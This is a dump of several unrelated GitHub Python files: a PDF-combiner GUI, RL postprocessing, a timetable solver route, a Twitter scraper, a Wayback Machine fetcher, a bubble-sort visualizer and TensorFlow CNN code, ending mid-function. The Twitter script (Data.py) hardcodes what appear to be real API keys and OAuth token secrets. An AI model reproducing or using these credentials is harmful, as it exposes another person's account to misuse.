Open \"\n \"destination folder?\"),\n TASK_ERROR_MESSAGE: lambda: messagebox.showerror(\"Error!\",\n \"Encountered an error \"\n \"when trying to combine pdfs.\"),\n TASK_NOOP_MESSAGE: lambda: messagebox.showerror(\"No Files Found!\",\n \"No files were found to combine in your directory!\")\n }\n\n def set_preview_tree(self):\n \"\"\"\n Set the tree-view previewing which files to aggregate.\n I hate this method but I'm too lazy to clean it up.\n \"\"\"\n preview_tree = self.preview_frame.preview_tree\n # clear it out first\n preview_tree.delete(*preview_tree.get_children())\n file_count = 0 # total number of files we plan on combining, used to track progress\n if self.source_directory_var.get():\n # source directory we selected as the root\n preview_tree.insert('',\n 'end',\n SOURCE_IID,\n text=path.split(self.source_directory_var.get())[1],\n open=True)\n # display any pdfs in root\n root_pdfs = combiner.get_files_to_merge_in_dir(self.source_directory_var.get(),\n include_jpg=self.include_jpg_var.get(),\n include_xps=self.include_xps_var.get())\n for root_pdf in root_pdfs:\n preview_tree.insert(SOURCE_IID,\n 'end',\n text=path.split(root_pdf)[1])\n file_count = len(root_pdfs)\n\n # get all its child directories\n children = combiner.get_child_dirs(self.source_directory_var.get())\n for child in children:\n preview_tree.insert(SOURCE_IID,\n 'end',\n child,\n text=path.split(child)[1])\n # any of its pdfs there\n child_pdfs = combiner.get_files_to_merge_in_dir(child,\n include_jpg=self.include_jpg_var.get(),\n include_xps=self.include_xps_var.get())\n for child_pdf in child_pdfs:\n preview_tree.insert(child,\n 'end',\n text=path.split(child_pdf)[1])\n\n file_count = file_count + len(child_pdfs)\n self.progress_bar.progress_goal = file_count\n\n # toggle whether the combine and select directory labels are disabled\n def toggle_button_disable(self, disabled):\n if disabled:\n print(\"buttons disabled\")\n self.source_select_row.button[STATE_KEY] = tk.DISABLED\n self.destination_select_row.button[STATE_KEY] = tk.DISABLED\n self.combinePdfsButton[STATE_KEY] = tk.DISABLED\n else:\n print(\"buttons enabled\")\n self.source_select_row.button[STATE_KEY] = tk.NORMAL\n self.destination_select_row.button[STATE_KEY] = tk.NORMAL\n self.combinePdfsButton[STATE_KEY] = tk.NORMAL\n","repo_name":"mbaker341997/pdf_combiner","sub_path":"pdf_combiner_frame.py","file_name":"pdf_combiner_frame.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15377062476","text":"import numpy as np\nimport sys\nfrom argparse import Namespace\nimport argparse\nimport Params\nimport scipy.stats.mstats\nimport Environments\nimport gym\n\nfinal_data = {\n}\n\nMAX_ITERS = 25\n\ndef extrapolate_linearly(x, arr):\n out = np.matrix(np.zeros((len(x),)))\n out[0,0:len(arr)] = arr\n increments = np.array([arr[-1] + (i+1)*arr[-1]/len(arr) for i in range(len(x) - len(arr))])\n out[0,len(arr):] = increments\n return (out)\n\ndef get_p_idx(data,p,threshold,fail):\n perc = np.percentile(data,p,axis=0)\n (ix,) = np.where(perc > threshold)\n if len(ix) != 0:\n idx = 100*(ix[0]+1)\n else:\n idx = fail\n return(idx)\n\ndef get_f_idx(data,p,fail):\n quantized = np.minimum(data, 1)\n perc = np.mean(quantized,axis=0)\n (ix,iy) = np.where(perc > p/100)\n if len(ix) != 0:\n idx = 100*(iy[0]+1)\n else:\n idx = fail\n return(idx)\n\ndef load_data(alg,env,model,ep1,ep2):\n print(\"Loading data for %s %s %s %s %s\" % (alg, env, model, ep1, ep2), 
flush=True)\n arr = {'solve':[],\n 'solve_low':[],\n 'solve_high':[],\n 'find':[],\n 'find_low':[],\n 'find_high':[]}\n solve_best = {}\n find_best = {}\n\n ### Solve is when average reward is 0.5*vstar\n E = gym.make(env)\n E.init(env_config={'dimension':1})\n threshold= 0.5*E.vstar\n T = Params.LockEpisodes[alg][0]\n x = np.arange(100,T+1,100)\n fail = 100*(len(x)+1)\n Params.reset_params()\n solve_median = {}\n solve_high = {}\n solve_low = {}\n find_median = {}\n find_high = {}\n find_low = {}\n hyperparams = {}\n for arg_list in Params.Parameters[env][alg]:\n P = Params.Params(arg_list)\n if str(P.env_param_1) != ep1 or str(P.env_param_2) != ep2 or str(P.model_type) != model:\n continue\n collated = None\n for i in range(1,MAX_ITERS+1):\n P.iteration = i\n fname = P.get_output_file_name()\n try:\n f = open(fname)\n except Exception:\n continue\n tmp = np.loadtxt(f,delimiter=',',dtype=float)\n tmp2 = extrapolate_linearly(x,tmp)\n if collated is None:\n collated = np.matrix(tmp2)\n else:\n collated = np.vstack((collated,tmp2))\n if collated is None:\n continue\n if P.horizon not in hyperparams.keys():\n hyperparams[P.horizon] = []\n solve_median[P.horizon] = []\n solve_high[P.horizon] = []\n solve_low[P.horizon] = []\n find_median[P.horizon] = []\n find_high[P.horizon] = []\n find_low[P.horizon] = []\n hyperparams[P.horizon].append(str(P))\n normalized = collated/x\n solve_median[P.horizon].append(get_p_idx(normalized, 50, threshold, fail))\n solve_low[P.horizon].append(get_p_idx(normalized, 90, threshold, fail))\n solve_high[P.horizon].append(get_p_idx(normalized, 10, threshold, fail))\n find_median[P.horizon].append(get_f_idx(collated, 50, fail))\n find_low[P.horizon].append(get_f_idx(collated, 10, fail))\n find_high[P.horizon].append(get_f_idx(collated, 90, fail))\n\n ### Now that we have preprocessed, find best parameter for each horizon\n lst = list(hyperparams.keys())\n lst.sort()\n for h in lst:\n idx = None\n min = np.min(solve_high[h])\n if idx is None and min < fail:\n idx = np.argmin(solve_high[h])\n min = np.min(solve_median[h])\n if idx is None and min < fail:\n idx = np.argmin(solve_median[h])\n min = np.min(solve_low[h])\n if idx is None and min < fail:\n idx = np.argmin(solve_low[h])\n if idx is None:\n print(\"SOLVE: H=%d, Time=Failure\" % (h), flush=True)\n arr['solve'].append(fail)\n arr['solve_high'].append(fail)\n arr['solve_low'].append(fail)\n solve_best[h] = None\n else:\n arr['solve'].append(solve_median[h][idx])\n arr['solve_high'].append(solve_high[h][idx])\n arr['solve_low'].append(solve_low[h][idx])\n print(\"SOLVE: H=%d, Median=%d, Low=%d, High=%d\" % (h, arr['solve'][-1], arr['solve_low'][-1], arr['solve_high'][-1]), flush=True)\n solve_best[h] = hyperparams[h][idx]\n idx = None\n min = np.min(find_high[h])\n if idx is None and min < fail:\n idx = np.argmin(find_high[h])\n min = np.min(find_median[h])\n if idx is None and min < fail:\n idx = np.argmin(find_median[h])\n min = np.min(find_low[h])\n if idx is None and min < fail:\n idx = np.argmin(find_low[h])\n if idx is None:\n print(\"FIND: H=%d, Time=Failure\" % (h), flush=True)\n arr['find'].append(fail)\n arr['find_high'].append(fail)\n arr['find_low'].append(fail)\n find_best[h] = None\n else:\n arr['find'].append(find_median[h][idx])\n arr['find_high'].append(find_high[h][idx])\n arr['find_low'].append(find_low[h][idx])\n print(\"FIND: H=%d, Median=%d, Low=%d, High=%d\" % (h, arr['find'][-1], arr['find_low'][-1], arr['find_high'][-1]), flush=True)\n find_best[h] = hyperparams[h][idx]\n arr['horizons'] 
= lst\n    return (arr, find_best, solve_best)\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description='StateDecoding Postprocessing Script')\n    parser.add_argument('--env', type=str, default=\"Lock-v0\",\n                        help='Environment', choices=[\"Lock-v0\", \"Lock-v1\", \"Lock-v2\"])\n    parser.add_argument('--alg', type=str, default=\"decoding\",\n                        help='Algorithm', choices=[\"decoding\", \"oracleq\", \"qlearning\"])\n    parser.add_argument('--model_type', type=str, default=\"linear\",\n                        help='Base Learner', choices=[\"nn\", \"linear\"])\n    parser.add_argument('--env_param_1', type=str, default=\"0.0\",\n                        help='Environment parameter', choices=[\"0.0\", \"0.1\"])\n    parser.add_argument('--env_param_2', type=str, default=\"None\",\n                        help='Environment parameter', choices=[\"None\", \"0.1\", \"0.2\", \"0.3\", \"0.5\"])\n    args = parser.parse_args()\n    return(args)\n\nif __name__=='__main__':\n    args = parse_args()\n    (arr, find_best, solve_best) = load_data(args.alg, args.env, args.model_type, args.env_param_1, args.env_param_2)\n    if args.alg == 'qlearning':\n        (fail,find_fail, solve_fail) = load_data('qlearning_fail', args.env, args.model_type, args.env_param_1, args.env_param_2)\n        arr['solve'][2] = fail['solve'][0]\n        arr['find'][3] = fail['find'][1]\n        arr['solve_low'][2] = fail['solve_low'][0]\n        arr['find_low'][3] = fail['find_low'][1]\n        arr['solve_high'][2] = fail['solve_high'][0]\n        arr['find_high'][3] = fail['find_high'][1]\n        find_best[20] = find_fail[20]\n        solve_best[15] = solve_fail[15]\n        print(fail)\n\n    import pickle\n    pickle.dump((arr, find_best, solve_best), open(\"./pkls/%s_%s_%s_%s_%s.pkl\" %(args.env, args.alg, args.model_type, args.env_param_1, args.env_param_2), \"wb\"))\n\n","repo_name":"microsoft/StateDecoding","sub_path":"Postprocess.py","file_name":"Postprocess.py","file_ext":"py","file_size_in_byte":7149,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"18"}
+{"seq_id":"72395006439","text":"from optapy import solver_factory_create\nfrom optapy import config\nfrom fastapi import APIRouter\nfrom optapy.types import Duration\nfrom models.lesson import Lesson\nfrom models.timetable import TimeTable\nfrom libs.constraints import define_constraints\nfrom utils.problem import generate_problem\nfrom services.api import Api\nfrom utils.color import pick_color\n\nmain_router = APIRouter(prefix=\"/api\", tags=[\"api\"])\n\n\n@main_router.get(\"/timetable\")\nasync def get_timetable():\n    solver_config = (\n        config.solver.SolverConfig()\n        .withEntityClasses(Lesson)\n        .withSolutionClass(TimeTable)\n        .withConstraintProviderClass(define_constraints)\n        .withTerminationSpentLimit(Duration.ofSeconds(120))\n    ) \n\n    solution: TimeTable = (\n        solver_factory_create(solver_config).buildSolver().solve(generate_problem())\n    )\n    print(solution)\n    timeslot_list = solution.timeslot_list\n    lesson_list = solution.lesson_list\n    room_list = solution.room_list\n\n    lesson_matriz = [\n        [[] for _ in range(len(room_list))] for _ in range(len(timeslot_list))\n    ]\n\n    for lesson in lesson_list:\n        lesson_timeslot_id = lesson.timeslot.id\n        lesson_room_id = lesson.room.id\n        c = pick_color(lesson.subject)\n        lesson.set_color(c)\n        lesson_matriz[lesson_timeslot_id][lesson_room_id].append(lesson)\n
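    # (Editor's note -- descriptive comment added.) lesson_matriz is indexed as\n    # [timeslot][room]: each cell accumulates the Lesson objects the solver put\n    # in that timeslot/room pair, which is what a timetable grid client renders.\n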
}\n","repo_name":"carlosCACB333/schedule_prediction","sub_path":"app/routes/mainRoute.py","file_name":"mainRoute.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23414661419","text":"import json\r\nimport tweepy\r\n\r\nCONSUMER_KEY = 'qBbQVx7x5Z8qQGdvwVddGpYsh'\r\nCONSUMER_SECRET = 'DKeUNiZGCoeDX7Lri8eNTmdEqSNMbu8wfaf700Y7NCNEqPRDZY'\r\nOAUTH_TOKEN = '1675967766-vbbn8baYe0e4t2zYpGv1O5jxdVBgeqCgeo2g17L'\r\nOAUTH_TOKEN_SECRET = 'j32CXSmvGVcP4VhVfl9JHwsOLRCOMIlvKjNRHznufRhmD'\r\n\r\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\r\nauth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\r\n\r\napi = tweepy.API(auth)\r\ncount =900\r\nres = tweepy.Cursor(api.search,\r\n q=\"“bernie sanders\",\r\n since = \"2019-04-06\",\r\n until = \"2019-04-07\",\r\n result_type='mixed',\r\n include_entities=True,\r\n monitor_rate_limit=False,\r\n wait_on_rate_limit=False,\r\n tweet_mode= 'extended').items(100)\r\nfor i in res:\r\n print(count)\r\n with open('BS/data_'+str(count)+'.txt', 'w') as outfile:\r\n json.dump(i._json, outfile)\r\n count += 1\r\n print(\"=================\")\r\n\r\n\r\n","repo_name":"bucky1995/CS_539_ML","sub_path":"hw4/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73027220520","text":"import json\nimport requests\nfrom unified.core.auth import Auth\n\n\ndef get_acess_token(headers):\n auth_info = {\n \"client_id\": headers['client_id'],\n \"client_secret\": headers['client_secret'],\n \"token\": headers['refresh_token'],\n \"refresh_url\": headers['token_url']\n }\n token = Auth().get_oauth2_token(auth_info)\n\n return json.loads(token)['access_token']\n\n\ndef rest(method, url, body, access_token):\n ''' returns response from request'''\n \n headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-Type': 'application/json'\n }\n if method == \"DELETE\":\n headers = {\n 'Authorization': f'Bearer {access_token}'\n }\n response = requests.request(method, url, headers=headers, data=body)\n\n return response\n","repo_name":"dipendrabaidawa/unified_api","sub_path":"unified/modules/main/categories/email_newsletters/aweber/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29396422488","text":"\"\"\"\nFetchs wayback machine for URLs against a query and uses randomly shuffled user agents list\n\nexample URLs.txt\n\nhttp://web.archive.org/web/*/dog%20and%20cat\nhttp://web.archive.org/web/*/houses\nhttp://web.archive.org/web/*/writing%20blogs\nhttp://web.archive.org/web/*/ultra%20fine\n...\n\n\nOR, just the queries 1 per line:\n\nexample URLs.txt\n\ndog and cat\nhouses\nwriting blogs\nultra fine\n...\n\nexample user-agents.txt\n\nMozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14\nMozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15\nMozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14\n...\n\n\"\"\"\nclass fetch_wayback_machine():\n def __init__(self):\n self.args = None\n self._proxy_index = -1\n self.parse_args()\n\n \"\"\"\n Parses CLI arguments. 
Used to assert all arguments are handled correctly.\n    \"\"\"\n    def parse_args(self):\n        import argparse\n\n        parser = argparse.ArgumentParser()\n\n        # required arguments\n        required = parser.add_argument_group('required arguments')\n        required.add_argument('-u', '--urls', metavar='', help='URLs to fetch (file path)', type=lambda s: self.file_path_validator(s), required=True)\n\n        # optional arguments\n        optional = parser.add_argument_group('optional arguments')\n        optional.add_argument('-ua', '--user-agents', metavar='', help='User agents to use (file path)', type=lambda s: self.file_path_validator(s, False), required=False)\n        optional.add_argument('-m', '--max-workers', metavar='', help='Max workers to use for threading', type=int, required=False)\n        optional.add_argument('-s', '--save-to', metavar='', help='Destination file path', type=str, required=False)\n        optional.add_argument('-p', '--proxy', metavar='', help='Proxy address', type=str, required=False)\n        optional.add_argument('-pf', '--proxies-file', metavar='', help='Use a list of proxies (file path)', type=lambda s: self.file_path_validator(s, False), required=False)\n        optional.add_argument('-l', '--log-errors', metavar='', help='Log errors to a file', type=str, required=False)\n        optional.add_argument('-xh', '--exclude-hosts', metavar='', help='Exclude hosts (query-suggested domains)', type=bool, required=False, default=False)\n\n        # parse arguments\n        self.args = vars(parser.parse_args())\n\n    \"\"\"\n    Validate file path CLI argument.\n    \"\"\"\n    def file_path_validator(self, path, required=True):\n        from os.path import exists\n        from argparse import ArgumentTypeError\n\n        if not path and not required:\n            return\n\n        if not exists( path ):\n            raise ArgumentTypeError(\"%s is an invalid file path\" % str(path))\n\n        return path\n\n    \"\"\"\n    Fetches the wayback machine for anchors and hosts\n    This is passed to a thread to execute with arguments\n    \"\"\"\n    def task_runner(self, args):\n        import requests\n        from json import loads\n\n        anchors_url = 'http://web.archive.org/__wb/search/anchor?q=%s' % args['query']\n        hosts_url = 'http://web.archive.org/__wb/search/host?q=%s' % args['query']\n        res = {'query': args['query']}\n\n        kwargs = dict(headers={'User-agent': args['user_agent']})\n        if not kwargs['headers']['User-agent']: del kwargs['headers']['User-agent']\n\n        if 'proxies' in args and args['proxies']:\n            self._proxy_index+=1\n\n            if self._proxy_index >= len( args['proxies'] ):\n                self._proxy_index = 0\n\n            proxy = args['proxies'][ self._proxy_index ]\n            kwargs['proxies'] = {'http' + ( 's' if 'https://' in proxy else '' ): proxy}\n\n        try:\n            try:\n                r = requests.get(anchors_url, **kwargs)\n                objects = r.json()\n\n                if objects and len(objects):\n                    res['anchors'] = [ x['link'] for x in objects ]\n                else:\n                    res['anchors'] = []\n            except Exception as e:\n                res['error'] = str(e)\n                return res\n\n            if not self.args['exclude_hosts']:\n                try:\n                    r = requests.get(hosts_url, **kwargs)\n                    objects = r.json()\n\n                    if objects and 'hosts' in objects.keys() and len(objects['hosts']):\n                        res['hosts'] = [ x['display_name'] for x in objects['hosts'] ]\n                except Exception as e:\n                    pass\n        except KeyboardInterrupt:\n            pass\n\n        return res\n\n    def run(self):\n        # first, load the URLs\n        from urllib.parse import unquote\n        from os.path import basename\n\n        queries = []\n        query_urls = {}\n        with open( self.args['urls'] ) as f:\n            while True:\n                raw_url = f.readline().rstrip()\n                url = unquote( raw_url )\n                if not url: break\n                query = basename( url )\n\n                if query:\n                    queries.append( query.rstrip() )\n                    query_urls[ 
query.rstrip() ] = raw_url\n\n        if not queries:\n            print ( 'No URLs retrieved.' )\n            return\n\n        # load user agents\n\n        user_agents = []\n        if self.args['user_agents']:\n            with open( self.args['user_agents'] ) as f:\n                while True:\n                    agent = f.readline().rstrip()\n                    if not agent: break\n                    user_agents.append( agent )\n\n        from random import shuffle\n        shuffle( user_agents )\n        \n        # max workers validate (default to 1 when the flag is omitted; the original called int(None) here and crashed)\n        self.args['max_workers'] = self.args['max_workers'] if self.args['max_workers'] and self.args['max_workers'] > 0 else 1\n\n        # load proxies\n\n        proxies = []\n        if self.args['proxies_file']:\n            with open( self.args['proxies_file'] ) as f:\n                while True:\n                    proxy = f.readline().rstrip()\n                    if not proxy: break\n                    proxies.append( proxy )\n\n        if not proxies and self.args['proxy']:\n            proxies = [ self.args['proxy'] ]\n\n        from concurrent.futures import ThreadPoolExecutor\n        from time import sleep\n        executor = ThreadPoolExecutor(max_workers=self.args['max_workers'])\n\n        json_obj = {}\n        object_lines = []\n\n        try:\n            query_list = []\n            for query in queries: query_list.append( {'query': query, 'user_agent': user_agents.pop() if user_agents else None, 'proxies': proxies} )\n            for res in executor.map(self.task_runner, [x for x in query_list]):\n                json_obj[ query_urls[ res['query'] ] ] = res\n\n                if not res:\n                    pass\n                elif 'error' in res.keys():\n                    if not self.args['log_errors']:\n                        from sys import stderr\n                    else:\n                        stderr = open(self.args['log_errors'], 'a')\n\n                    print ( '%s ended with an error: %s' % ( query_urls[ res['query'] ], res['error'] ), file=stderr )\n                elif 'hosts' in res.keys() or 'anchors' in res.keys():\n\n                    if 'anchors' in res.keys() and len(res['anchors']):\n                        for anchor in res['anchors']: object_lines.append( anchor )\n\n                    if 'hosts' in res.keys() and len(res['hosts']):\n                        for host in res['hosts']: object_lines.append( host )\n        except KeyboardInterrupt:\n            pass\n        except Exception as e:\n            print ( 'Caught exception: %s' % (e) )\n\n        if not len( json_obj.keys() ):\n            return\n\n        if self.args['save_to']:\n            from os.path import realpath\n            try:\n                with open( self.args['save_to'], 'w' ) as f: f.write( '\\n'.join( object_lines ) + '\\n' )\n                print ( 'Saved to %s' % realpath(self.args['save_to']) ) \n            except Exception as e:\n                print ( 'Saving to %s ended with an error: %s' % ( realpath(self.args['save_to']), str(e) ) )\n                print ( '\\n'.join( object_lines ) )\n        else:\n            # just print to stdout\n            print ( '\\n'.join( object_lines ) )\n\nif '__main__' == __name__:\n    app = fetch_wayback_machine()\n    app.run()\n","repo_name":"elhardoum/scrape-wayback-machine","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":8321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"16235005859","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals\n\n\nRESTYPE = {\n    'Director': 1,\n    'Storage': 2,\n    'FileDaemon': 3,\n    'Client': 4,\n    'Messages': 5,\n    'Catalog': 6,\n    'Schedule': 7,\n    'Job': 8,\n    'JobDefs': 9,\n    'Fileset': 10,\n    'Pool': 11,\n    'Device': 12,\n    'Autochanger': 13,\n    'Include': 14,\n    'Exclude': 15,\n    'Options': 16,\n    'SDAddresses': 17,\n    'IP': 18,\n}\n","repo_name":"empereira/IBAdmin","sub_path":"config/restype.py","file_name":"restype.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"18497734331","text":"import numpy as np\nimport pandas as pd\n\ndef search(id):\n    user_data = pd.read_csv(\"util/user_profile.csv\", encoding=\"cp949\")\n    IDs = user_data[\"id\"].values.tolist()\n    for 
people in IDs:\n if(id==people):\n return True\n return False","repo_name":"mumwa/caregiver-Soon","sub_path":"util/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1874039958","text":"import pygame\nimport random\n\n# Set up the window and font\npygame.init()\nWINDOW_WIDTH, WINDOW_HEIGHT = 800, 600\nFONT_SIZE = 32\nfont = pygame.font.SysFont(None, FONT_SIZE)\nwindow = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\npygame.display.set_caption(\"Bubble Sort Visualizer\")\n\n# Set up the array and variables\nARRAY_SIZE = 50\narray = [random.randint(1, 100) for _ in range(ARRAY_SIZE)]\ni = 0\nj = 0\ndone = False\n\n# Set up the colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nGRAY = (128, 128, 128)\n\n# Draw the array on the screen\ndef draw_array():\n bar_width = WINDOW_WIDTH // ARRAY_SIZE\n bar_height_scale = (WINDOW_HEIGHT - FONT_SIZE) // max(array)\n for index, value in enumerate(array):\n bar_height = value * bar_height_scale\n bar_x = index * bar_width\n bar_y = WINDOW_HEIGHT - bar_height\n bar_color = WHITE if index != i and index != j else BLUE\n pygame.draw.rect(window, bar_color, (bar_x, bar_y, bar_width, bar_height))\n\n# Draw the current step on the screen\ndef draw_step():\n text = font.render(f\"Step {i * ARRAY_SIZE + j + 1}\", True, BLACK)\n window.blit(text, (10, 10))\n pygame.display.update()\n\n# Bubble Sort algorithm\ndef bubble_sort():\n global i, j, done\n if i == ARRAY_SIZE - 1:\n done = True\n return\n if j == ARRAY_SIZE - i - 1:\n i += 1\n j = 0\n if array[j] > array[j + 1]:\n array[j], array[j + 1] = array[j + 1], array[j]\n j += 1\n\n# Main loop\nwhile not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n \n # Update the array and display\n bubble_sort()\n window.fill(GRAY)\n draw_array()\n draw_step()\n pygame.display.update()\n\npygame.quit()\n","repo_name":"Sbussiso/Magic8Ball.py","sub_path":"Magic8Ball.py","file_name":"Magic8Ball.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74868428841","text":"import collections\n\n#empty dictionary\ndict = {}\ndict2 = {}\n\n#read input file\nf = open(\"input.txt\")\nalpha_list = [\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',\n 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'\n]\n\nval = 0\nfor line in f:\n new = []\n #print (val)\n inputline = line.split(\" \")\n #print (len(inputline))\n #print (inputline)\n for i in range(len(inputline)):\n if inputline[i] == '1':\n new.append(alpha_list[i])\n #print (new)\n dict[val] = new\n dict2[alpha_list[val]] = new\n #print (dict2)\n val += 1\n\n#print (\"Matrix in characters:\\n\", dict)\ndict2 = collections.OrderedDict(sorted(dict2.items()))\n#print dict2)\n\ninp1 = input('Input1: ')\ninp2 = input('Input2: ')\n#print (inp1,inp2)\nlst1 = []\nlst2 = []\nfor i in range(len(alpha_list)):\n #print (i)\n if alpha_list[i] == inp1:\n lst1 += dict[i]\n #print(\"appended1\")\n if alpha_list[i] == inp2:\n lst2 += dict[i]\n #print(\"appended2\")\n\n #print(\"List1: \", lst1)\n #print(\"List2: \", lst2)\n\n # print (\"Task 1 output: \", list(set(lst2).intersection(lst1)))\n\nwith open('output.txt', 'w') as o1:\n o1.write(\"Task 1 output: \" + str(list(set(lst2).intersection(lst1))))\n\n\n# find all path\ndef 
find_all_path(graph, start, end, path=[]):\n    path = path + [start]\n    #print(path)\n    if (start == end):\n        return [path]\n    if start not in graph:\n        return []  # return an empty list (not None) so callers can iterate safely\n    paths = []\n    for node in graph[start]:\n        if node not in path:\n            newpaths = find_all_path(graph, node, end, path)\n            for newpath in newpaths:\n                paths.append(newpath)\n    return paths\n\n\n#print(find_all_path(dict2,inp1,inp2))\nlst = find_all_path(dict2, inp1, inp2)\n\n# pick the shortest of the discovered paths (the original index juggling here\n# mixed list lengths with list objects and could raise a TypeError)\nshortest = min(lst, key=len)\n\n# print(\"Task 2 output: \", shortest)\n\nwith open('output.txt', 'a') as o1:\n    o1.write(\"\\nTask 2 output: \" + str(\"-\".join(str(x) for x in shortest)))","repo_name":"arangates/usc-labs","sub_path":"lab2/social_network.py","file_name":"social_network.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14944634383","text":"import os\r\n\r\nf = open(\"ip_list.txt\", 'w')\r\n\r\nfor seg2 in range(204, 209):\r\n    for seg3 in range(0, 31):\r\n        for seg4 in range(2, 255):\r\n            gen_ip = f\"10.{seg2}.{seg3}.{seg4}\"\r\n            print(gen_ip, file=f)\r\n            print(f\"Added ip address: {gen_ip}\")\r\n","repo_name":"TheOriginalBob0705/ping-ip-range","sub_path":"generate_ip.py","file_name":"generate_ip.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"16007423619","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization, Activation, GlobalAveragePooling2D, Flatten, Dense, Lambda\nimport numpy as np\nfrom tensorflow import pad\nimport tensorflow as tf\nfrom tensorflow import keras\n# cnn without padding\ndef create_small_cnn_np(k,n_hidden=512):\n    model = Sequential()\n    model.add(BatchNormalization(input_shape=(k, k, 1)))\n    model.add(Conv2D(n_hidden, kernel_size=k))\n    model.add(Activation('relu'))\n    model.add(GlobalAveragePooling2D())\n    #model.add(Dense(2))\n    model.add(Dense(2, activation=\"softmax\"))\n    return model\n\ndef create_fcn(k, n_hidden=512):\n    model = Sequential()\n    model.add(BatchNormalization(input_shape=(k, k, 1)))\n    model.add(Flatten())\n    model.add(Dense(n_hidden, activation='relu'))\n    model.add(Dense(2, activation='softmax'))\n\n    return model\n\ndef circular_padding(x, padding_size):\n    # Approximate circular padding on the input tensor; tf.pad has no true\n    # circular/wrap mode, so SYMMETRIC (reflection) padding is used here.\n    return tf.pad(x, [[0, 0], [padding_size, padding_size], [padding_size, padding_size], [0, 0]], mode='SYMMETRIC')\n\n\ndef create_small_cnn(k, n_hidden=512,kernel_size=17, padding_size=8):\n    model = Sequential()\n    model.add(BatchNormalization(input_shape=(k, k, 1)))\n    model.add(Lambda(lambda x: circular_padding(x, padding_size)))\n    model.add(Conv2D(n_hidden, kernel_size=kernel_size, padding='SAME')) #VALID (the original hard-coded 17 instead of using the kernel_size argument)\n    model.add(Activation('relu'))\n    model.add(GlobalAveragePooling2D())\n    model.add(Dense(2, activation=\"softmax\"))\n\n    return model\n\n
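# (Editor's note -- illustrative sketch added by the editor, not part of the\n# original file.) tf.pad only supports CONSTANT, REFLECT and SYMMETRIC modes,\n# which is why circular_padding() above is really reflection padding. If truly\n# periodic boundaries are wanted, the wrap can be built by concatenating the\n# opposite edges of the NHWC tensor instead:\ndef wrap_padding(x, padding_size):\n    # wrap rows: prepend the bottom rows and append the top rows\n    x = tf.concat([x[:, -padding_size:, :, :], x, x[:, :padding_size, :, :]], axis=1)\n    # wrap columns: prepend the rightmost columns and append the leftmost ones\n    x = tf.concat([x[:, :, -padding_size:, :], x, x[:, :, :padding_size, :]], axis=2)\n    return x\n\n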
def create_dataset_dots(k=100):\n    input_shape = (k, k)\n    X_1 = np.zeros(input_shape)+0.5\n    X_2 = X_1.copy()\n    X_1[k//2][k//2]+=0.5\n    X_2[k//2][k//2]-=0.5\n    Xs = np.stack([X_1, X_2], axis=0)\n    ys = np.array([1, 0])\n    return Xs, ys\n\ndef train_dot_model(model, batch_X,batch_y,criterion,opt,LR):\n    for idx in range(2000):\n        total_loss = 0\n        total_acc = 0\n\n        with tf.GradientTape() as tape:\n            output = model(batch_X, training=True)\n            loss = criterion(batch_y, output)\n\n        gradients = tape.gradient(loss, model.trainable_variables)\n        opt.apply_gradients(zip(gradients, model.trainable_variables))\n\n        total_loss += loss * tf.cast(tf.shape(batch_y)[0], dtype=tf.float32)\n        total_acc += tf.reduce_sum(\n            tf.cast(tf.math.argmax(output, axis=1) == tf.cast(batch_y, dtype=tf.int64), tf.float32)\n        ).numpy()\n\n        if (idx + 1) % 800 == 0:\n            LR /= 10\n            opt.learning_rate.assign(LR)\n\n        if (idx + 1) % 100 == 0:\n            print(\"Epoch: {}, Train Acc: {:.3f}, Loss: {:.3f}\".format(\n                idx + 1, total_acc * 100. / batch_y.numpy().shape[0], total_loss / batch_y.numpy().shape[0]\n            ))\n\ndef train_dot_model_no_verbose(model, batch_X,batch_y,criterion,opt,LR):\n    for idx in range(2000):\n        with 